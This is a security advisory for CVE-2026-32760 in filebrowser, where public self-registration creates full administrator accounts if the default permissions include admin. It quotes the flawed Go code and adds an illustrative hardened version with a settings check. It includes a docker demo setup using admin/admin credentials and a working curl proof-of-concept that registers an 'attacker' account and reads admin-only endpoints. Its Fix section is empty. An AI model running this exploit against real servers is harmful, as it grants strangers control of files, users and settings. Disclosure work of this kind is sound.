PT-2026-25858 · Go · Github.Com/Filebrowser/Filebrowser/V2

Published 2026-03-16 · Updated 2026-03-16 · CVE-2026-32760

CVSS v4.0: 10
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Summary

Any unauthenticated visitor can register a full administrator account when self-registration (signup = true) is enabled and the default user permissions have perm.admin = true. The signup handler blindly applies all default settings - including Perm.Admin - to the new user without any server-side guard that strips admin from self-registered accounts.

Details

Affected file: http/auth.go

Vulnerable code:

// signupHandler (http/auth.go)
user := &users.User{
  Username: info.Username,
}
d.settings.Defaults.Apply(user)  // ← copies Perm.Admin = true if set in defaults
// NO guard: user.Perm.Admin is never cleared here

settings.UserDefaults.Apply (settings/defaults.go):

func (d *UserDefaults) Apply(u *users.User) {
  u.Perm = d.Perm  // copies full Permissions struct, including Admin field
  ...
}

Settings API permits Admin in defaults (http/settings.go):

var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
  ...
  d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true
  ...
})

The signupHandler is supposed to create unprivileged accounts for new visitors. It contains no explicit user.Perm.Admin = false reset after Defaults.Apply. If an administrator (intentionally or accidentally) configures defaults.perm.admin = true and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings.
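As an added illustration (not code from the filebrowser project), the following Go program models the two paths with minimal stand-in types named after the ones above: SignupVulnerable reproduces the missing guard, SignupHardened adds the server-side reset after Apply, and AuditSettings is an assumed helper that flags a settings document, in the shape of the PUT /api/settings body shown later in the demo setup, where signup and defaults.perm.admin are both enabled.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Stand-ins for the filebrowser types named above (constructed, not the project's own).
type Permissions struct {
	Admin  bool `json:"admin"`
	Create bool `json:"create"`
}
type UserDefaults struct{ Perm Permissions `json:"perm"` }
type Settings struct {
	Signup   bool         `json:"signup"`
	Defaults UserDefaults `json:"defaults"`
}
type User struct {
	Username string
	Perm     Permissions
}

// Apply copies the whole Permissions struct, Admin included, as the advisory describes.
func (d *UserDefaults) Apply(u *User) { u.Perm = d.Perm }

// SignupVulnerable reproduces the flaw: Apply runs and nothing clears Admin afterwards.
func SignupVulnerable(s *Settings, name string) *User {
	u := &User{Username: name}
	s.Defaults.Apply(u)
	return u
}

// SignupHardened clears Admin after Apply, so a self-registered account is never an admin.
func SignupHardened(s *Settings, name string) *User {
	u := SignupVulnerable(s, name)
	u.Perm.Admin = false
	return u
}

// AuditSettings parses a PUT /api/settings-shaped body and flags signup + admin defaults both on.
func AuditSettings(raw []byte) (bool, error) {
	var s Settings
	if err := json.Unmarshal(raw, &s); err != nil {
		return false, err
	}
	return s.Signup && s.Defaults.Perm.Admin, nil
}

func main() {
	risky, err := AuditSettings([]byte(`{"signup":true,"defaults":{"perm":{"admin":true}}}`))
	fmt.Println("signup with admin defaults:", risky, err)
}
```

Running the audit against an exported settings document is a quick way to confirm an instance is not in the vulnerable configuration while a patched build is rolled out.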

Demo Server Setup

# Pull latest release
docker run -d --name fb-test \
  -p 8080:80 \
  -v /tmp/fb-data:/srv \
  filebrowser/filebrowser:v2.31.2

# Wait for startup, then set defaults.perm.admin = true
ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}')

# Enable signup and set admin as default permission
curl -s -X PUT http://localhost:8080/api/settings \
  -H "X-Auth: $ADMIN_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "signup": true,
    "defaults": {
      "perm": {
        "admin": true,
        "execute": true,
        "create": true,
        "rename": true,
        "modify": true,
        "delete": true,
        "share": true,
        "download": true
      }
    }
  }'

PoC Exploit

#!/bin/bash
# poc_signup_admin.sh
# Demonstrates: unauthenticated signup → admin account

TARGET="http://localhost:8080"

echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
  -X POST "$TARGET/api/signup" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"

echo "[*] Logging in as newly created account..."
ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')

echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" \
  -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool

echo ""
echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" \
  -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool

Expected output: The attacker's token successfully returns the full user list and server settings - endpoints restricted to Perm.Admin = true users.

Impact

Any unauthenticated visitor who can reach POST /api/signup obtains a full admin account. From there, they can:
  • List, read, modify, and delete every file on the server
  • Create, modify, and delete all other users
  • Change authentication method and server settings
  • Execute arbitrary commands if enableExec = true

Fix

Weakness Enumeration

Improper Access Control
Improper Privilege Management

Related Identifiers

CVE-2026-32760
GHSA-5GG9-5G7W-HM73

Affected Products

Github.Com/Filebrowser/Filebrowser/V2